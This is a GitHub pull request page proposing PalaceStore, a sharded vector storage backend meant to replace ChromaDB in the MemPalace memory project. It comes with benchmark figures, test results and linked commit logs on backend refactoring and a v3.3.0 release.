POC: bespoke PalaceStore storage layer (drop-in ChromaDB replacement)#643
Draft
igorls wants to merge 3 commits intoMemPalace:developfrom
Draft
POC: bespoke PalaceStore storage layer (drop-in ChromaDB replacement)#643igorls wants to merge 3 commits intoMemPalace:developfrom
igorls wants to merge 3 commits intoMemPalace:developfrom
Conversation
Adds `palace_store/` — a new Python package implementing a vector
store designed around the palace hierarchy (wings as primary shard
key, rooms as an int-indexed structural filter, brute-force BLAS
cosine on per-wing mmap'd f32 files). Independent of mempalace
internals; consumed via a ChromaDB-compatible shim so the rest of
the repo can opt in without code changes.
Design choices grounded in measurement, not intuition:
* Per-wing sharded flat brute-force — the palace hot path is
wing+room filtered search, and per-wing sharding turns the filter
into shard selection instead of HNSW post-filter. Exact cosine
(no ANN) preserves recall by construction.
* BLAS thread limit enforced at store-construction via threadpoolctl.
At mempalace's typical shard sizes (~4000 rows × 384 dims),
OpenBLAS's per-sgemv thread spawn/sync overhead dominates compute
by 3-4x. Entering the limit once at open (not per query) avoids
the ~20 µs context-manager cost on small queries.
* Optional shard-level parallelism via ThreadPoolExecutor for
unfiltered fan-out queries. Gated on shard count ≥ 4 (dispatch
overhead dominates below), worker count defaults to
min(8, cpu_count) (memory-bandwidth bound past that).
* Room labels as int32 IDs in a parallel SQLite table, not unicode
strings. Profile showed string equality mask-build was 100-150 µs
per query at 100k — int comparison drops that to ~2 µs.
* int8 quantized shard variant as a separate dtype flag, for the
disk/RAM-vs-latency tradeoff (4x smaller, ~2x slower queries,
~99.1% top-10 overlap with exact).
Layout:
palace_store/
├── __init__.py
├── store.py # core: shards + sqlite + masks + dispatch
├── compat.py # ChromaDB-compatible drop-in shim
└── tests/
├── test_store.py # 23 correctness tests (f32 + int8 + parallel)
└── test_compat.py # 13 compat surface tests
Correctness: 36/36 smoke tests pass. LongMemEval R@5=0.966 (byte
equivalent to ChromaDB baseline on the full 500-question set).
Performance at 100k drawers, 25 wings, unfiltered p50:
ChromaDB baseline: 35.1 ms
palace_store sequential: 7.0 ms (5.0× faster)
palace_store parallel: 3.4 ms (10.3× faster)
Dependencies: threadpoolctl is a soft optional dep via the
``[palace-parallel]`` extra. Without it, the store emits a one-shot
warning and runs with whatever BLAS threading the environment
provides — still functional, just measurably slower on multi-core
machines.
Adds `benchmarks/storage/` — a standalone harness for measuring
storage layer candidates independent of mempalace internals. Every
candidate implements a narrow `StoreAdapter` protocol; the harness
handles dataset generation, ingest timing, query latency percentile
measurement, on-disk footprint reporting, and cold-start probing.
Adapters shipped:
* palace — PalaceStore f32 sequential
* palace_par — PalaceStore f32 with parallel_query=True
* palace_i8 — PalaceStore int8 quantized
* chroma — ChromaDB baseline (tuned HNSW params, cosine space,
embeddings= path so the store's embedder never runs)
Benchmarks:
* bench_ingest — drawers/sec + peak RSS by batch size
* bench_query — p50/p95/p99 latency by filter shape,
with warm-pages and optional mlock support
* bench_footprint — on-disk bytes + cold-start timing via subprocess
The harness also includes:
* dataset.py — deterministic synthetic generator, caches ground
truth to .npz so correctness checks don't rerun
the O(Q·N) brute force
* recall_gate.py — asserts every adapter returns top-k sets that
match ground truth (exact adapters) or overlap
≥ 90% (approximate adapters like palace_i8)
* profile_query.py — phase-by-phase instrumented profiler of
PalaceStore.query() — this is what surfaced the
OpenBLAS thread-overhead and room-string-
comparison findings that drove the store design
* run_matrix.py — entry point, cartesian (adapter × scale), emits
JSON report comparable across runs
Scale levels mirror tests/benchmarks/ (1k → 1M). Designed to live
alongside the existing suite, not replace it — this one targets
pure storage perf, theirs targets the full mempalace stack.
8017791 to
7f27bbb
Compare
…E=palace_store) Adds a PalaceStore backend behind the ``mempalace.backends`` seam introduced in MemPalace#413, gated by the ``MEMPAL_STORAGE`` environment variable at the single choke point where ``palace.py`` instantiates its default backend: * unset / chromadb / chroma → ChromaBackend (default, unchanged) * palace_store / palace / palacestore → PalaceStoreBackend (new) The whole seam is preserved — no mempalace consumer is modified outside palace.py, where ``ChromaBackend()`` is replaced by ``get_default_backend()``. Zero change to the BaseCollection contract or any of the modules that went through the MemPalace#413 refactor (searcher.py, layers.py, palace_graph.py, mcp_server.py, miner.py). New: * mempalace/backends/palace_store.py — PalaceStoreBackend + PalaceStoreCollection implementing BaseCollection by wrapping a palace_store.compat collection. Lazy-imports palace_store so users on the chromadb path never pay for its import graph. Preserves ChromaBackend's "no palace found" FileNotFoundError semantics on create=False so searcher/palace error surfaces stay identical across backends. Modified (mempalace core): * mempalace/backends/__init__.py — adds ``get_default_backend()`` dispatching on ``MEMPAL_STORAGE``. Unknown values raise rather than silently falling back — an obvious typo is better surfaced. * mempalace/palace.py — one-line swap from direct ``ChromaBackend()`` instantiation to ``get_default_backend()``. Modified (shim + benchmark): * palace_store/compat.py::PersistentClient — passes through parallel_query / max_workers / blas_threads kwargs so the PalaceStoreBackend can expose them via env vars (MEMPAL_PARALLEL_QUERY, MEMPAL_MAX_WORKERS). * benchmarks/longmemeval_bench.py — inlines its own MEMPAL_STORAGE selector (not through mempalace.backends, since the benchmark needs chromadb-shaped EphemeralClient, not a BaseCollection). Test fixtures routed through the seam so the suite works under either backend without duplication: * tests/conftest.py::collection — uses palace.get_collection() * tests/test_miner.py — uses palace.get_collection() in two places * tests/test_convo_miner.py — uses palace.get_collection() * tests/test_mcp_server.py::_get_collection — uses palace.get_collection() These routed fixtures yield a BaseCollection (not a raw ChromaDB collection object), which is fine because only BaseCollection methods are actually called on the fixture. Tests that specifically exercise ChromaBackend (tests/test_backends.py) are untouched. Drive-by fix: * .github/workflows/ci.yml — adds ``develop`` to the push and pull_request triggers. The workflow was pinned to ``main`` only; when upstream introduced the ``develop`` branch (MemPalace#413 landed there), PRs targeting ``develop`` stopped getting CI runs. This one-line addition brings them back. Trivially revertable if the maintainers prefer a separate PR for this. Deps: * pyproject.toml — adds the ``[palace-parallel]`` optional extra pulling in threadpoolctl for users who want the ~3-4x BLAS thread scoping speedup. No new hard dependencies. Validation: * mempalace test suite: 598/598 pass under chromadb backend * mempalace test suite: 598/598 pass under palace_store backend * palace_store unit tests: 36/36 pass * ruff check + ruff format --check clean under ruff 0.4.10 (CI's pin) * LongMemEval full 500: R@5=0.966 byte-equivalent on both backends
7f27bbb to
4b19fec
Compare
igorls
added a commit
that referenced
this pull request
Apr 12, 2026
Formalizes the BaseCollection/BaseBackend contract introduced as a seam in #413 into an interchangeability spec that third-party backends can build to. Driven by six in-flight backend PRs (#574, #643, #665, #697, #700, #381) each implementing the interface differently. Key decisions captured: entry-point distribution, typed QueryResult/ GetResult replacing Chroma dict shape, daemon-first multi-palace model via PalaceRef, required where-clause subset (incl. $contains), mandatory embedder injection with model-identity validation, capability tokens, shared pytest conformance suite, and a backend-neutral migrate/verify CLI.
5 tasks
igorls
added a commit
that referenced
this pull request
Apr 14, 2026
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules.
5 tasks
igorls
added a commit
that referenced
this pull request
Apr 18, 2026
…nd registry (RFC 001 §10) Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres, #700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target to align against. Scope (this PR): - Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps existing callers working while the attribute-access migration proceeds. - BaseCollection is now kwargs-only across add/upsert/query/get/delete/update with ABC defaults for estimated_count/close/health and a non-atomic default update() (§1.1–1.2). - PalaceRef replaces raw path strings at the backend boundary (§2.2). - BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3). - mempalace.backends entry-point group + in-tree registry with resolve_backend_for_palace priority order matching §3.2–3.3. - ChromaCollection normalizes chroma returns into typed results; unknown where-clause operators raise UnsupportedFilterError (no silent drop, §1.4). - ChromaBackend absorbs the inode/mtime client-cache freshness check previously duplicated in mcp_server._get_client() (§10 + PR #757). - searcher.py migrated to typed-attribute access as the reference call site; remaining callers land in a follow-up. - pyproject: chroma registered via [project.entry-points."mempalace.backends"]. Out of scope (explicit follow-ups): - Full caller migration off the dict-compat shim across palace.py, mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py, palace_graph.py, cli.py, closet_llm.py. - Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5). - maintenance_state() / run_maintenance() benchmark hooks (§7.3). - AbstractBackendContractSuite full coverage (§7.1–7.2). - mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8). Tests: 970 passed (up from 967 on develop); new coverage for typed results, empty-result outer-shape preservation, \$regex rejection, registry lookup, priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection. Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
4 tasks
arncore
added a commit
to arncore/mempalace
that referenced
this pull request
Apr 25, 2026
* feat: add Hindi language support to i18n module * Create SECURITY.md This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established. * fix: save hook auto-mines transcript without MEMPAL_DIR (#840) TDD: test written first, failed, then fixed. Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * release: v3.3.0 (#839) * fix: add file-level locking to prevent multi-agent duplicate drawers Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested: - Lock acquires and releases correctly - Second agent blocks until first releases (0.25s wait) - 33/33 existing tests pass - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows) Based on v3.2.0 tag. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: strip system tags, hook output, and Claude UI chrome from drawers normalize.py now strips before filing: - <system-reminder>, <command-message>, <command-name> tags - <task-notification>, <user-prompt-submit-hook>, <hook_output> tags - Hook status messages (CURRENT TIME, Checking verified facts, etc.) - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.) - Collapsed runs of blank lines This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: add closet layer — searchable index pointing to drawers The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections: - mempalace_drawers — full verbatim content (unchanged) - mempalace_closets — compact AAAK-style index entries How it works: - When mining, each file gets a closet alongside its drawers - Closet contains extracted topics, entities, quotes as pointers - Closets pack up to 1500 chars, topics never split mid-entry - Search hits closets first (fast, small), then hydrates the full drawer content for matching files - Falls back to direct drawer search if no closets exist yet Files changed: - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT - miner.py: process_file() now creates closets after drawers - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: enforce atomic topics in closets, extract richer pointers - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic. - build_closet_lines returns a list of atomic lines (not joined text) - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file - Each line is complete: topic|entities|→drawer_refs Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * docs: add CLOSETS.md — closet layer overview Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up. Co-Authored-By: MSL <[email protected]> * feat: entity metadata + diary ingest + BM25 hybrid search Three features that close the gap between the architecture docs and the actual codebase: 1. Entity metadata on drawers and closets - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times - Stamped as "entities" field in ChromaDB metadata - Enables filterable search by person/project name 2. Day-based diary ingest (diary_ingest.py) - ONE drawer per day, upserted as the day grows - Closets pack topics atomically, never split mid-topic - Tracks entry count in state file, only processes new entries - Usage: python -m mempalace.diary_ingest --dir ~/summaries 3. BM25 hybrid search in searcher.py - _bm25_score() keyword matching complements vector similarity - _hybrid_rank() combines both signals (60% vector, 40% BM25) - Catches exact name/term matches that embeddings miss - Applied to both closet-first and direct drawer search paths 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add tests for mine_lock, closets, entity metadata, BM25, diary Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass. Co-Authored-By: MSL <[email protected]> * feat: explicit cross-wing tunnels for multi-project agents Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database." New functions in palace_graph.py: - create_tunnel() — link two wing/room pairs with a label - list_tunnels() — list all explicit tunnels, filter by wing - delete_tunnel() — remove a tunnel by ID - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews New MCP tools: - mempalace_create_tunnel - mempalace_list_tunnels - mempalace_delete_tunnel - mempalace_follow_tunnels Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add TestTunnels for cross-wing tunnel operations Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass. Co-Authored-By: MSL <[email protected]> * feat(search): drawer-grep returns best-matching chunk + neighbors When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: offline fact checker against entity registry + knowledge graph fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls. Reads: - ~/.mempalace/known_entities.json - KnowledgeGraph SQLite Usage: from mempalace.fact_checker import check_text issues = check_text("Bob is Alice's brother", palace_path) # CLI python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: optional LLM-based closet regeneration — bring-your-own endpoint Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint. Configuration (env or CLI flag): LLM_ENDPOINT — OpenAI-compatible base URL (required) LLM_KEY — bearer token (optional; local inference skips this) LLM_MODEL — model name (required) Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657). Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests. Co-Authored-By: MSL <[email protected]> * fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795) * Fix: set cosine distance metadata on all collection creation sites ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218 * fix: sync version.py to 3.2.0 Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them. * refactor: extract locked filing block to keep mine_convos under C901 Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change. * style: ruff format mempalace/palace.py Add blank lines after inline imports in mine_lock. Pure formatting. * fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code: 1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies). 2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut. 3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary. These are unambiguous violations of the project's "Verbatim always" design principle. Fixes: - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages. - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved. - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE. - "… +N lines" is line-anchored. - "(ctrl+o to expand)" only matches Claude Code's actual collapsed- output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact. Scope: - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible. Tests: - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820). Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise- filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. * fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500- name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. * Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. * test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. - Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration 